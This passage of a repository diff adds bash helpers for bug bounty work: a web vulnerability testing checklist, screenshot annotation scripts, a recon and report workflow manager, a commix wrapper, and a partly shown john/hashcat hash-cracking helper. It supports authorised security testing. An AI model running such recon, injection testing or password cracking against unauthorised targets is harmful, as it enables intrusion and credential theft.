- [ ] Check for subdomain takeovers (already scanned)
- [ ] Test exposed admin panels (from Nuclei)
- [ ] Check for default credentials
- [ ] Test open redirects in `?url=` parameters

### Phase 2: Authorization Testing
- [ ] Create 2+ accounts at different privilege levels
- [ ] Test IDOR on all endpoints with user identifiers
- [ ] Test horizontal access (User A → User B)
- [ ] Test vertical access (User → Admin)
- [ ] Use Burp Autorize for automated testing

### Phase 3: Input Validation
- [ ] Test XSS in all input fields
- [ ] Test SQL injection in parameters
- [ ] Test SSRF in URL/webhook parameters
- [ ] Test XXE in XML endpoints
- [ ] Test SSTI in template fields

### Phase 4: Business Logic
- [ ] Test race conditions (payments, redemptions)
- [ ] Test negative quantities
- [ ] Test price manipulation
- [ ] Test insecure password reset flows

### Phase 5: Deep Dive
- [ ] JavaScript analysis for hidden endpoints
- [ ] API testing (hidden methods, versions)
- [ ] Session management testing
- [ ] CSRF testing

---

## 🛠️ Recommended Tools for Manual Testing

**Burp Suite Extensions:**
- LinkFinder - Parse JS for endpooints
- Hunt Scanner RMX - Highlight interesting parameters
- Autorize - Automated authorization testing
- Burp Bounty - Custom scan checks + Blind XSS

**Command-line:**
- `sqlmap` - SQL injection testing
- `ffuf` - Directory/parameter fuzzing (if needed)
- `dalfox` - XSS scanner
- `nuclei` - CVE and exploit template scanning

**Remember:** Run aggressive tools ONLY if within bug bounty program rules!

---

## 📚 Resources

- [Jason Haddix - The Bug Hunter's Methodology](https://www.youtube.com/watch?v=uKWu6yhnhbQ)
- [PortSwigger Web Security Academy](https://portswigger.net/web-security)
- [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)
- [HackerOne Disclosed Reports](https://hackerone.com/hacktivity)

---

**Generated by bb-report-generator v1.0.0**
EOF
|
||||||
|
|
||||||
|
# Wrap-up: report where the guide landed and how to use it.
printf '%b\n' "${GREEN}✓ Report generated:${NC} $REPORT_FILE"
echo
printf '%b\n' "${CYAN}Next steps:${NC}"
printf '%s\n' \
  " 1. Read the manual testing guide" \
  " 2. Answer 'The Big 6 Questions'" \
  " 3. Follow the prioritized testing checklist" \
  " 4. Find FEATURES first, then BUGS second!"
|
||||||
67
scripts/pentesting/bb-screenshot
Executable file
67
scripts/pentesting/bb-screenshot
Executable file
|
|
@ -0,0 +1,67 @@
|
||||||
|
#!/usr/bin/env bash
# Bug Bounty Screenshot Helper with Automatic Borders and Annotations
# Usage: bb-screenshot.sh [program-name]
#
# Captures a screenshot via Flameshot, frames it with an ImageMagick
# border + drop shadow, saves it under the program's screenshots dir,
# and copies the relative path to the clipboard for pasting into a
# vulnerability JSON file.

set -euo pipefail

PROGRAM="${1:-current}"
SCREENSHOT_DIR="${HOME}/bug-bounty/${PROGRAM}/screenshots"
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
TEMP_FILE="/tmp/flameshot_${TIMESTAMP}.png"
FINAL_FILE="${SCREENSHOT_DIR}/${TIMESTAMP}_screenshot.png"

# Colors
GREEN='\033[0;32m'
BLUE='\033[0;34m'
YELLOW='\033[1;33m'
NC='\033[0m'

# Ensure screenshot directory exists
mkdir -p "$SCREENSHOT_DIR"

echo -e "${BLUE}[+] Bug Bounty Screenshot Tool${NC}"
echo -e "${YELLOW}[!] Take your screenshot, annotate as needed, then click Save${NC}"
echo ""

# Take screenshot with Flameshot (with annotation tools).
# BUGFIX: flameshot exits non-zero when the user aborts the capture, which
# killed the script under `set -e` BEFORE the cancellation check below
# could ever run. Tolerate the exit status and detect cancellation by the
# absence of the output file instead.
flameshot gui -p "$TEMP_FILE" || true

# Check if screenshot was actually taken (user might have cancelled)
if [[ ! -f "$TEMP_FILE" ]]; then
    echo -e "${YELLOW}[!] Screenshot cancelled${NC}"
    exit 0
fi

echo -e "${GREEN}[✓] Screenshot captured${NC}"
echo -e "${BLUE}[+] Adding professional border...${NC}"

# Add border and shadow using ImageMagick
convert "$TEMP_FILE" \
    -bordercolor '#333333' -border 2 \
    -bordercolor white -border 10 \
    -bordercolor '#333333' -border 2 \
    \( +clone -background black -shadow 80x5+5+5 \) \
    +swap -background white -layers merge +repage \
    "$FINAL_FILE"

# Remove temp file
rm -f -- "$TEMP_FILE"

echo -e "${GREEN}[✓] Screenshot saved with border: $FINAL_FILE${NC}"
echo -e "${BLUE}[+] Copying path to clipboard...${NC}"

# Copy filename to clipboard (for easy paste into JSON); try X11 first,
# then Wayland, then warn.
echo "screenshots/$(basename "$FINAL_FILE")" | xclip -selection clipboard 2>/dev/null || \
    echo "screenshots/$(basename "$FINAL_FILE")" | wl-copy 2>/dev/null || \
    echo -e "${YELLOW}[!] Could not copy to clipboard (install xclip or wl-clipboard)${NC}"

echo ""
echo -e "${GREEN}Path copied: screenshots/$(basename "$FINAL_FILE")${NC}"
echo -e "${YELLOW}[!] Paste this into your vulnerability JSON file${NC}"

# Optional: Open the screenshot to verify
if command -v feh &> /dev/null; then
    feh "$FINAL_FILE" &
elif command -v eog &> /dev/null; then
    eog "$FINAL_FILE" &
fi
|
||||||
178
scripts/pentesting/bb-screenshot-annotate
Executable file
178
scripts/pentesting/bb-screenshot-annotate
Executable file
|
|
@ -0,0 +1,178 @@
|
||||||
|
#!/usr/bin/env bash
# Advanced Bug Bounty Screenshot with Pre-made Annotation Templates
# Usage: bb-screenshot-annotate.sh <program> <type>
# Types: vulnerability, proof, request, response, comparison, evidence
#
# Prints per-type annotation tips, captures a Flameshot screenshot, frames
# it with a type-colored ImageMagick border + shadow, and copies the
# relative path to the clipboard for pasting into a vulnerability JSON.

set -euo pipefail

PROGRAM="${1:-current}"
TYPE="${2:-vulnerability}"
SCREENSHOT_DIR="${HOME}/bug-bounty/${PROGRAM}/screenshots"
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
TEMP_FILE="/tmp/flameshot_${TIMESTAMP}.png"
FINAL_FILE="${SCREENSHOT_DIR}/${TIMESTAMP}_${TYPE}.png"

# Colors
RED='\033[0;31m'
GREEN='\033[0;32m'
BLUE='\033[0;34m'
YELLOW='\033[1;33m'
NC='\033[0m'

# Ensure screenshot directory exists
mkdir -p "$SCREENSHOT_DIR"

show_usage() {
    cat << EOF
Bug Bounty Screenshot Annotation Tool

Usage: bb-screenshot-annotate.sh <program> <type>

Screenshot Types:
  vulnerability - Highlighting the vulnerability (red arrows/boxes)
  proof         - Proof of exploitation (green success indicators)
  request       - HTTP request in Burp Suite
  response      - HTTP response showing vulnerability
  comparison    - Before/After comparison
  evidence      - General evidence screenshot

Examples:
  bb-screenshot-annotate.sh juice-shop vulnerability
  bb-screenshot-annotate.sh acme proof
  bb-screenshot-annotate.sh target request

Tips:
  - Use Flameshot's built-in tools for annotation:
    * Arrow (for pointing)
    * Rectangle (for highlighting)
    * Text (for labels)
    * Pixelate (for redacting sensitive data)
  - Red for vulnerabilities
  - Green for successful exploitation
  - Yellow for important notes

EOF
}

if [[ "${1:-}" == "-h" ]] || [[ "${1:-}" == "--help" ]]; then
    show_usage
    exit 0
fi

# Display tips based on screenshot type; unknown types abort here, so the
# border-color case further down only ever sees valid values.
case "$TYPE" in
    vulnerability)
        echo -e "${RED}[!] VULNERABILITY SCREENSHOT${NC}"
        echo -e "${YELLOW}Tips:${NC}"
        echo " - Use RED arrows to point at the vulnerability"
        echo " - Use RED rectangles to highlight affected areas"
        echo " - Add text labels explaining what's wrong"
        ;;
    proof)
        echo -e "${GREEN}[!] PROOF OF EXPLOITATION${NC}"
        echo -e "${YELLOW}Tips:${NC}"
        echo " - Show successful exploitation result"
        echo " - Highlight important output (session cookies, data, etc.)"
        echo " - Use GREEN to show success"
        ;;
    request)
        echo -e "${BLUE}[!] HTTP REQUEST SCREENSHOT${NC}"
        echo -e "${YELLOW}Tips:${NC}"
        echo " - Capture Burp Suite request"
        echo " - Highlight malicious payload in RED"
        echo " - Show request method and endpoint clearly"
        ;;
    response)
        echo -e "${BLUE}[!] HTTP RESPONSE SCREENSHOT${NC}"
        echo -e "${YELLOW}Tips:${NC}"
        echo " - Capture server response"
        echo " - Highlight vulnerability indicators (errors, data leaks)"
        echo " - Show status code and response headers"
        ;;
    comparison)
        echo -e "${YELLOW}[!] BEFORE/AFTER COMPARISON${NC}"
        echo -e "${YELLOW}Tips:${NC}"
        echo " - Show side-by-side comparison"
        echo " - Label 'BEFORE' and 'AFTER' clearly"
        echo " - Highlight the difference"
        ;;
    evidence)
        echo -e "${BLUE}[!] GENERAL EVIDENCE${NC}"
        echo -e "${YELLOW}Tips:${NC}"
        echo " - Capture relevant evidence"
        echo " - Annotate important details"
        echo " - Keep it clear and professional"
        ;;
    *)
        echo -e "${RED}[-] Unknown type: $TYPE${NC}"
        echo "Valid types: vulnerability, proof, request, response, comparison, evidence"
        exit 1
        ;;
esac

echo ""
echo -e "${BLUE}[+] Opening Flameshot...${NC}"
echo -e "${YELLOW}[!] Annotate your screenshot, then click Save${NC}"
echo ""

# Take screenshot with Flameshot (with annotation tools).
# BUGFIX: flameshot exits non-zero on user abort; under `set -e` that
# killed the script before the cancellation check below could run.
flameshot gui -p "$TEMP_FILE" || true

# Check if screenshot was actually taken
if [[ ! -f "$TEMP_FILE" ]]; then
    echo -e "${YELLOW}[!] Screenshot cancelled${NC}"
    exit 0
fi

echo -e "${GREEN}[✓] Screenshot captured${NC}"
echo -e "${BLUE}[+] Adding professional border and shadow...${NC}"

# Pick border color based on type (all valid types are covered above, but
# keep a default so BORDER_COLOR can never be unbound under `set -u`)
case "$TYPE" in
    vulnerability)
        BORDER_COLOR='#DC143C' # Crimson red
        ;;
    proof)
        BORDER_COLOR='#228B22' # Forest green
        ;;
    request|response)
        BORDER_COLOR='#4169E1' # Royal blue
        ;;
    comparison)
        BORDER_COLOR='#FF8C00' # Dark orange
        ;;
    evidence|*)
        BORDER_COLOR='#696969' # Dim gray
        ;;
esac

# Add colored border, white mat, outer border, and drop shadow
convert "$TEMP_FILE" \
    -bordercolor "$BORDER_COLOR" -border 3 \
    -bordercolor white -border 12 \
    -bordercolor '#333333' -border 1 \
    \( +clone -background black -shadow 80x5+8+8 \) \
    +swap -background white -layers merge +repage \
    "$FINAL_FILE"

# Remove temp file
rm -f -- "$TEMP_FILE"

echo -e "${GREEN}[✓] Screenshot saved: $FINAL_FILE${NC}"
echo -e "${BLUE}[+] Copying path to clipboard...${NC}"

# Copy relative path to clipboard (X11, then Wayland, then warn)
RELATIVE_PATH="screenshots/$(basename "$FINAL_FILE")"
echo "$RELATIVE_PATH" | xclip -selection clipboard 2>/dev/null || \
    echo "$RELATIVE_PATH" | wl-copy 2>/dev/null || \
    echo -e "${YELLOW}[!] Could not copy to clipboard${NC}"

echo ""
echo -e "${GREEN}Path: $RELATIVE_PATH${NC}"
echo -e "${YELLOW}[!] Paste this into your vulnerability JSON:${NC}"
echo -e ' "path": "'"$RELATIVE_PATH"'",'

# Show in file manager
if command -v xdg-open &> /dev/null; then
    xdg-open "$(dirname "$FINAL_FILE")" &
fi
|
||||||
52
scripts/pentesting/bb-screenshot-batch
Executable file
52
scripts/pentesting/bb-screenshot-batch
Executable file
|
|
@ -0,0 +1,52 @@
|
||||||
|
#!/usr/bin/env bash
# Batch process existing screenshots with borders
# Usage: bb-screenshot-batch.sh <directory>
#
# Applies the standard ImageMagick border + drop shadow to every image in
# <directory> (non-recursive) and writes results to <directory>/processed.

set -euo pipefail

SOURCE_DIR="${1:-.}"
OUTPUT_DIR="${SOURCE_DIR}/processed"

if [[ ! -d "$SOURCE_DIR" ]]; then
    echo "Error: Directory not found: $SOURCE_DIR"
    exit 1
fi

mkdir -p "$OUTPUT_DIR"

echo "[+] Processing screenshots in: $SOURCE_DIR"
echo "[+] Output directory: $OUTPUT_DIR"
echo ""

# Find all PNG and JPG images. NUL-delimited into an array so filenames
# containing spaces or newlines survive (the original joined paths with
# newlines in a flat string).
mapfile -d '' -t IMAGES < <(find "$SOURCE_DIR" -maxdepth 1 \( -name "*.png" -o -name "*.jpg" -o -name "*.jpeg" \) -print0 | sort -z)

if [[ ${#IMAGES[@]} -eq 0 ]]; then
    echo "[-] No images found in $SOURCE_DIR"
    exit 1
fi

COUNT=0
TOTAL=${#IMAGES[@]}

for IMAGE in "${IMAGES[@]}"; do
    # BUGFIX: the original used ((COUNT++)); with COUNT=0 the expression
    # evaluates to 0, the arithmetic command returns status 1, and
    # `set -e` aborted the script on the very first iteration.
    COUNT=$((COUNT + 1))
    FILENAME=$(basename "$IMAGE")
    OUTPUT_FILE="$OUTPUT_DIR/$FILENAME"

    echo "[$COUNT/$TOTAL] Processing: $FILENAME"

    # Add professional border and shadow
    convert "$IMAGE" \
        -bordercolor '#333333' -border 2 \
        -bordercolor white -border 10 \
        -bordercolor '#333333' -border 2 \
        \( +clone -background black -shadow 80x5+5+5 \) \
        +swap -background white -layers merge +repage \
        "$OUTPUT_FILE"
done

echo ""
echo "[✓] Processed $COUNT images"
echo "[✓] Output: $OUTPUT_DIR"
|
||||||
259
scripts/pentesting/bb-workflow
Executable file
259
scripts/pentesting/bb-workflow
Executable file
|
|
@ -0,0 +1,259 @@
|
||||||
|
#!/usr/bin/env bash
# Bug Bounty Workflow Helper
# Manages the complete workflow from recon to report

set -euo pipefail

PROGRAM="${1:-}"
DOMAIN="${2:-}"
BB_ROOT="${HOME}/bug-bounty"
TEMPLATE_DIR="${HOME}/.claude/context/business/security/bug-bounty"

# Colors
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
# BUGFIX: CYAN is referenced in run_recon() but was never defined; under
# `set -u` that aborted the script with an "unbound variable" error right
# after the manual testing guide was generated.
CYAN='\033[0;36m'
NC='\033[0m' # No Color
|
||||||
|
|
||||||
|
show_usage() {
    # Emit the CLI help text. Quoted delimiter: the text contains no
    # expansions, so take it literally.
    cat << 'EOF'
Bug Bounty Workflow Helper

Usage: bb-workflow.sh <command> [args]

Commands:
  init <program> <domain>       Initialize directory structure for new program
  recon <program>               Run reconnaissance on program
  test <program> <url> <type>   Quick vulnerability test helper
  screenshot <program> [type]   Take annotated screenshot with border
  report <program> <vuln-id>    Generate PDF report from JSON
  status <program>              Show program status and findings

Examples:
  bb-workflow.sh init acme acme.com
  bb-workflow.sh recon acme
  bb-workflow.sh test acme http://localhost:3002 xss
  bb-workflow.sh screenshot acme vulnerability
  bb-workflow.sh report acme acme-xss-001

Directory Structure:
  ~/bug-bounty/<program>/
  ├── recon/          # Reconnaissance data
  ├── screenshots/    # Evidence screenshots
  ├── discoveries/    # Vulnerability JSON files
  └── reports/        # Generated PDF reports
EOF
}
|
||||||
|
|
||||||
|
init_program() {
    # Create the on-disk skeleton for a new bug bounty program:
    # recon/, screenshots/, discoveries/, reports/ plus info.txt, a
    # .gitignore for sensitive artifacts, and .gitkeep placeholders.
    local prog="$1"
    local dom="$2"
    local base="$BB_ROOT/$prog"
    local sub

    echo -e "${BLUE}[+] Initializing bug bounty program: $prog${NC}"

    for sub in recon screenshots discoveries reports; do
        mkdir -p "$base/$sub"
    done

    # Create program info file (expands program name, domain and date)
    cat > "$base/info.txt" << EOF
Program: $prog
Domain: $dom
Started: $(date +%Y-%m-%d)
Platform: [HackerOne/Bugcrowd/Other]
Scope: [Add scope notes]

Rules:
- [Add important rules from program policy]

Notes:
- [Add your notes here]
EOF

    # Create .gitignore (quoted delimiter: nothing to expand)
    cat > "$base/.gitignore" << 'EOF'
# Sensitive bug bounty data
screenshots/
discoveries/*.json
reports/*.pdf
recon/

# Keep directory structure
!discoveries/.gitkeep
!screenshots/.gitkeep
!reports/.gitkeep
!recon/.gitkeep
EOF

    # Placeholders so the empty directories survive a git clone
    for sub in discoveries screenshots reports recon; do
        touch "$base/$sub/.gitkeep"
    done

    echo -e "${GREEN}[✓] Program initialized: $base${NC}"
    echo -e "${YELLOW}[!] Edit info.txt with program details${NC}"
}
|
||||||
|
|
||||||
|
run_recon() {
    # Run every available recon helper for <program> (passive, light, and
    # safe-mode bb-recon), then generate the manual testing guide from the
    # newest bb-recon output directory.
    local program="$1"
    local program_dir="$BB_ROOT/$program"
    # BUGFIX: the success message at the bottom used ${CYAN}, which is not
    # defined at file scope — an unbound-variable abort under `set -u`.
    # Keep a local fallback so this function is safe on its own.
    local cyan='\033[0;36m'

    if [[ ! -d "$program_dir" ]]; then
        echo -e "${RED}[-] Program directory not found: $program_dir${NC}"
        echo -e "${YELLOW}[!] Run: bb-workflow.sh init $program <domain>${NC}"
        exit 1
    fi

    # Get domain from info.txt. awk exits 0 even when nothing matches, so
    # this is safe under `set -e` (the original hid grep's status behind
    # `local var=$(...)`, which masks command-substitution failures).
    local domain
    domain=$(awk '/^Domain:/ {print $2; exit}' "$program_dir/info.txt")

    if [[ -z "$domain" ]]; then
        echo -e "${RED}[-] Domain not found in info.txt${NC}"
        exit 1
    fi

    echo -e "${BLUE}[+] Running reconnaissance on $domain${NC}"
    echo -e "${YELLOW}[!] This will take some time...${NC}"

    cd "$program_dir/recon"

    # Run your existing recon scripts (each is optional)
    if [[ -x "${HOME}/scripts/passive-recon" ]]; then
        echo -e "${BLUE}[+] Running passive recon...${NC}"
        "${HOME}/scripts/passive-recon" "$domain"
    fi

    if [[ -x "${HOME}/scripts/light-recon" ]]; then
        echo -e "${BLUE}[+] Running light recon...${NC}"
        "${HOME}/scripts/light-recon" "$domain"
    fi

    if [[ -x "${HOME}/scripts/bb-recon" ]]; then
        echo -e "${BLUE}[+] Running bug bounty recon (safe mode)...${NC}"
        "${HOME}/scripts/bb-recon" "https://$domain"
    fi

    echo -e "${GREEN}[✓] Reconnaissance complete!${NC}"
    echo -e "${YELLOW}[!] Review results in: $program_dir/recon/${NC}"

    # Generate manual testing guide from the newest bb-recon-* directory
    if [[ -x "${HOME}/scripts/bb-report-generator" ]]; then
        echo -e "${BLUE}[+] Generating manual testing guide...${NC}"
        # NOTE(review): -printf is GNU find; fine on Linux, not BSD/macOS.
        # cut -f2- (was -f2) keeps directory names that contain spaces.
        local latest_recon
        latest_recon=$(find . -maxdepth 1 -type d -name "bb-recon-*" -printf '%T@ %p\n' | sort -rn | head -1 | cut -d' ' -f2-)
        if [[ -n "$latest_recon" ]]; then
            "${HOME}/scripts/bb-report-generator" "$latest_recon"
            echo -e "${GREEN}[✓] Manual testing guide created!${NC}"
            echo -e "${cyan}[*] Read: $latest_recon/manual-testing-guide.md${NC}"
        fi
    fi
}
|
||||||
|
|
||||||
|
quick_test() {
    # Thin wrapper around the quick-vuln-test helper.
    # $1 = program (accepted for interface symmetry; the helper does not
    # take it), $2 = target URL, $3 = vulnerability type.
    local prog="$1"
    local target_url="$2"
    local vuln_type="$3"

    echo -e "${BLUE}[+] Quick vulnerability test: $vuln_type${NC}"
    "${HOME}/scripts/quick-vuln-test.sh" "$target_url" "$vuln_type"
}
|
||||||
|
|
||||||
|
take_screenshot() {
    # Delegate to the annotation-aware screenshot helper for <program>.
    # The screenshot type ($2) defaults to "evidence".
    local prog="$1"
    local shot_type="${2:-evidence}"

    if [[ ! -d "$BB_ROOT/$prog" ]]; then
        echo -e "${RED}[-] Program directory not found: $prog${NC}"
        exit 1
    fi

    # NOTE(review): the repo ships this helper as "bb-screenshot-annotate"
    # (no .sh suffix) — confirm the installed filename matches this call.
    "${HOME}/scripts/bb-screenshot-annotate.sh" "$prog" "$shot_type"
}
|
||||||
|
|
||||||
|
generate_report() {
    # Render discoveries/<vuln-id>.json into reports/<vuln-id>.pdf via the
    # LaTeX template project, then open the PDF for review when a desktop
    # opener is available.
    local prog="$1"
    local vuln_id="$2"
    local prog_dir="$BB_ROOT/$prog"

    local json_file="$prog_dir/discoveries/${vuln_id}.json"
    local pdf_file="$prog_dir/reports/${vuln_id}.pdf"

    if [[ ! -f "$json_file" ]]; then
        echo -e "${RED}[-] JSON file not found: $json_file${NC}"
        exit 1
    fi

    echo -e "${BLUE}[+] Generating PDF report...${NC}"

    cd "$TEMPLATE_DIR"
    bun run latex/generate.ts "$json_file" "$pdf_file"

    # Guard clause instead of the original if/else — same behavior
    if [[ ! -f "$pdf_file" ]]; then
        echo -e "${RED}[-] Report generation failed${NC}"
        exit 1
    fi

    echo -e "${GREEN}[✓] Report generated: $pdf_file${NC}"
    echo -e "${YELLOW}[!] Review before submitting!${NC}"

    # Open PDF (if on desktop with xdg-open)
    if command -v xdg-open &> /dev/null; then
        xdg-open "$pdf_file" &
    fi
}
|
||||||
|
|
||||||
|
show_status() {
    # Print the program's info.txt plus counts of discovery JSON files and
    # generated PDF reports, then list the discovery filenames.
    local program="$1"
    local program_dir="$BB_ROOT/$program"

    if [[ ! -d "$program_dir" ]]; then
        echo -e "${RED}[-] Program not found: $program${NC}"
        exit 1
    fi

    echo -e "${BLUE}=== Bug Bounty Program Status ===${NC}"
    echo ""
    cat "$program_dir/info.txt"
    echo ""
    echo -e "${BLUE}=== Findings ===${NC}"

    # Declaration split from assignment so find's exit status is not
    # silently masked by `local`; a missing subdirectory degrades to 0
    # instead of aborting under `set -e`/pipefail.
    local findings reports
    findings=$(find "$program_dir/discoveries" -name "*.json" -not -name ".gitkeep" 2>/dev/null | wc -l) || findings=0
    reports=$(find "$program_dir/reports" -name "*.pdf" 2>/dev/null | wc -l) || reports=0

    echo "Total findings: $findings"
    echo "Generated reports: $reports"

    if [[ $findings -gt 0 ]]; then
        echo ""
        echo "Discoveries:"
        # IDIOM FIX: was `ls -1 ... | xargs -n1 basename` (parsing ls);
        # let find print basenames directly, sorted to match ls ordering.
        find "$program_dir/discoveries" -maxdepth 1 -name "*.json" -printf '%f\n' | sort
    fi
}
|
||||||
|
|
||||||
|
# Main command router — dispatch on the first CLI argument; every command
# validates its required arguments before delegating.
case "${1:-}" in
    init)
        if [[ -z "${2:-}" || -z "${3:-}" ]]; then
            show_usage
            exit 1
        fi
        init_program "$2" "$3"
        ;;
    recon)
        if [[ -z "${2:-}" ]]; then
            show_usage
            exit 1
        fi
        run_recon "$2"
        ;;
    test)
        if [[ -z "${2:-}" || -z "${3:-}" || -z "${4:-}" ]]; then
            show_usage
            exit 1
        fi
        quick_test "$2" "$3" "$4"
        ;;
    screenshot|ss)
        if [[ -z "${2:-}" ]]; then
            show_usage
            exit 1
        fi
        take_screenshot "$2" "${3:-evidence}"
        ;;
    report)
        if [[ -z "${2:-}" || -z "${3:-}" ]]; then
            show_usage
            exit 1
        fi
        generate_report "$2" "$3"
        ;;
    status)
        if [[ -z "${2:-}" ]]; then
            show_usage
            exit 1
        fi
        show_status "$2"
        ;;
    *)
        show_usage
        exit 1
        ;;
esac
|
||||||
14
scripts/pentesting/commix
Executable file
14
scripts/pentesting/commix
Executable file
|
|
@ -0,0 +1,14 @@
|
||||||
|
#!/usr/bin/env bash
# Wrapper for commix (command injection testing tool)
# Routes to the correct commix installation.
#
# GENERALIZED: the install location was hard-coded to /home/e; it now
# defaults to ~/commix (identical for that user) and can be overridden
# via the COMMIX_PATH environment variable.

COMMIX_PATH="${COMMIX_PATH:-${HOME}/commix/commix.py}"

if [[ ! -f "$COMMIX_PATH" ]]; then
    echo "Error: commix not found at $COMMIX_PATH" >&2
    echo "Install with: git clone https://github.com/commixproject/commix.git $(dirname "$COMMIX_PATH")" >&2
    exit 1
fi

# Execute commix with python3 (exec replaces this shell, so commix's
# argv and exit status pass straight through)
exec python3 "$COMMIX_PATH" "$@"
|
||||||
274
scripts/pentesting/crack
Executable file
274
scripts/pentesting/crack
Executable file
|
|
@ -0,0 +1,274 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: crack
# Description: Hash cracking helper (john/hashcat wrapper)
#
# Usage:
#   crack <hashfile>               # Auto-detect and crack
#   crack <hashfile> -w wordlist   # Specify wordlist
#   crack <hashfile> -m md5        # Specify hash type
#   crack identify <hash>          # Identify hash type

VERSION="1.0.0"

# ANSI color constants used throughout the script
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
show_help() {
    # Print the full CLI help text. printf '%b' interprets the \033
    # escapes stored in the color variables, exactly like `echo -e`.
    printf '%b\n' "${BOLD}crack${NC} - Hash Cracking Helper v${VERSION}"
    printf '\n'
    printf '%b\n' "${BOLD}USAGE:${NC}"
    printf '%s\n' " crack <hashfile> [OPTIONS]"
    printf '%s\n' " crack identify <hash>"
    printf '\n'
    printf '%b\n' "${BOLD}COMMANDS:${NC}"
    printf '%b\n' " ${CYAN}crack <file>${NC} Crack hashes in file"
    printf '%b\n' " ${CYAN}identify <hash>${NC} Identify hash type"
    printf '%b\n' " ${CYAN}show <file>${NC} Show cracked passwords"
    printf '\n'
    printf '%b\n' "${BOLD}OPTIONS:${NC}"
    printf '%b\n' " ${CYAN}-w, --wordlist FILE${NC} Specify wordlist"
    printf '%b\n' " ${CYAN}-m, --mode TYPE${NC} Hash type (md5, sha1, sha256, ntlm, etc.)"
    printf '%b\n' " ${CYAN}-r, --rules${NC} Apply John rules"
    printf '%b\n' " ${CYAN}-f, --format${NC} John format string"
    printf '%b\n' " ${CYAN}-h, --help${NC} Show this help"
    printf '\n'
    printf '%b\n' "${BOLD}EXAMPLES:${NC}"
    printf '%s\n' " crack hashes.txt # Auto crack with default wordlist"
    printf '%s\n' " crack hashes.txt -w rockyou.txt # Use specific wordlist"
    printf '%s\n' " crack hashes.txt -m md5 # Specify MD5 hashes"
    printf '%s\n' " crack identify 5f4dcc3b5aa765d61d8327deb882cf99"
    printf '%s\n' " crack show hashes.txt # Show cracked results"
    printf '\n'
    printf '%b\n' "${BOLD}COMMON HASH TYPES:${NC}"
    printf '%s\n' " md5, sha1, sha256, sha512"
    printf '%s\n' " ntlm, mssql, mysql"
    printf '%s\n' " bcrypt, des, raw-md5"
    printf '\n'
    printf '%b\n' "${BOLD}INSTALLED TOOLS:${NC}"
    # Live availability probes — output varies with the host environment
    command -v john &>/dev/null && printf '%b\n' " ${GREEN}✓${NC} john (John the Ripper)" || printf '%b\n' " ${RED}✗${NC} john (install: sudo apt install john)"
    command -v hashcat &>/dev/null && printf '%b\n' " ${GREEN}✓${NC} hashcat" || printf '%b\n' " ${RED}✗${NC} hashcat (install: sudo apt install hashcat)"
    command -v hashid &>/dev/null && printf '%b\n' " ${GREEN}✓${NC} hashid (hash identifier)" || printf '%b\n' " ${RED}✗${NC} hashid (install: pip install hashid)"
}
|
||||||
|
|
||||||
|
# Detect available tools
|
||||||
|
get_cracker() {
    # Print the preferred installed cracker ("john" before "hashcat");
    # exit 1 with a hint on stderr when neither is available.
    local tool
    for tool in john hashcat; do
        if command -v "$tool" &>/dev/null; then
            echo "$tool"
            return 0
        fi
    done
    echo -e "${RED}Error:${NC} No hash cracker found" >&2
    echo "Install one: sudo apt install john hashcat" >&2
    exit 1
}
|
||||||
|
|
||||||
|
# Identify hash type
|
||||||
|
identify_hash() {
    # Best-effort hash identification: defer to hashid when installed,
    # otherwise guess from the digest length.
    local target="$1"

    printf '%b\n' "${CYAN}[*]${NC} Identifying hash: ${BOLD}$target${NC}"
    printf '\n'

    if command -v hashid &>/dev/null; then
        hashid "$target"
        return
    fi

    # Manual identification based on length
    local hlen=${#target}

    printf '%b\n' "${YELLOW}Hash Identification:${NC}"
    case "$hlen" in
        32)
            printf '%s\n' " Possible: MD5, NTLM"
            printf '%s\n' " John format: --format=raw-md5 or --format=nt"
            printf '%s\n' " Hashcat mode: -m 0 (MD5) or -m 1000 (NTLM)"
            ;;
        40)
            printf '%s\n' " Possible: SHA1"
            printf '%s\n' " John format: --format=raw-sha1"
            printf '%s\n' " Hashcat mode: -m 100"
            ;;
        64)
            printf '%s\n' " Possible: SHA256, SHA3-256"
            printf '%s\n' " John format: --format=raw-sha256"
            printf '%s\n' " Hashcat mode: -m 1400"
            ;;
        128)
            printf '%s\n' " Possible: SHA512"
            printf '%s\n' " John format: --format=raw-sha512"
            printf '%s\n' " Hashcat mode: -m 1700"
            ;;
        60)
            # bcrypt strings start with $2a$ / $2y$ / $2b$
            if [[ "$target" =~ ^\$2[ayb]\$ ]]; then
                printf '%s\n' " Identified: bcrypt"
                printf '%s\n' " John format: --format=bcrypt"
                printf '%s\n' " Hashcat mode: -m 3200"
            fi
            ;;
        *)
            printf '%s\n' " Unknown hash type (length: $hlen)"
            printf '%s\n' " Try: hashid '$target'"
            ;;
    esac
}
|
||||||
|
|
||||||
|
# Find common wordlists
|
||||||
|
find_wordlist() {
    # Print the first wordlist that exists on this system, searching a
    # fixed preference order; prints an empty line when none is found.
    local candidate
    local -a candidates=(
        "/usr/share/wordlists/rockyou.txt"
        "/usr/share/wordlists/rockyou.txt.gz"
        "/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt"
        "/usr/share/dict/words"
    )

    for candidate in "${candidates[@]}"; do
        if [[ -f "$candidate" ]]; then
            echo "$candidate"
            return 0
        fi
    done

    echo ""
}
|
||||||
|
|
||||||
|
# Crack with John the Ripper
|
||||||
|
# Crack hashes with John the Ripper.
# Arguments: $1 hash file, $2 optional --format value, $3 optional
# wordlist path, $4 "true" to enable John's mangling rules.
crack_john() {
    local hashfile="$1"
    local format="${2:-}"
    local wordlist="${3:-}"
    local rules="${4:-false}"

    echo -e "${CYAN}[*]${NC} Using John the Ripper"
    echo -e "${CYAN}[*]${NC} Hash file: $hashfile"

    # BUGFIX: options were accumulated in a flat string and expanded
    # unquoted, which (a) word-split wordlist paths containing spaces and
    # (b) embedded a literal "<(zcat ...)" for gzipped wordlists —
    # process substitution is NOT re-parsed out of a variable expansion,
    # so john received garbage arguments. Build an argv array instead and
    # inflate .gz wordlists to a temporary file.
    local -a john_args=()
    local tmp_wordlist=""

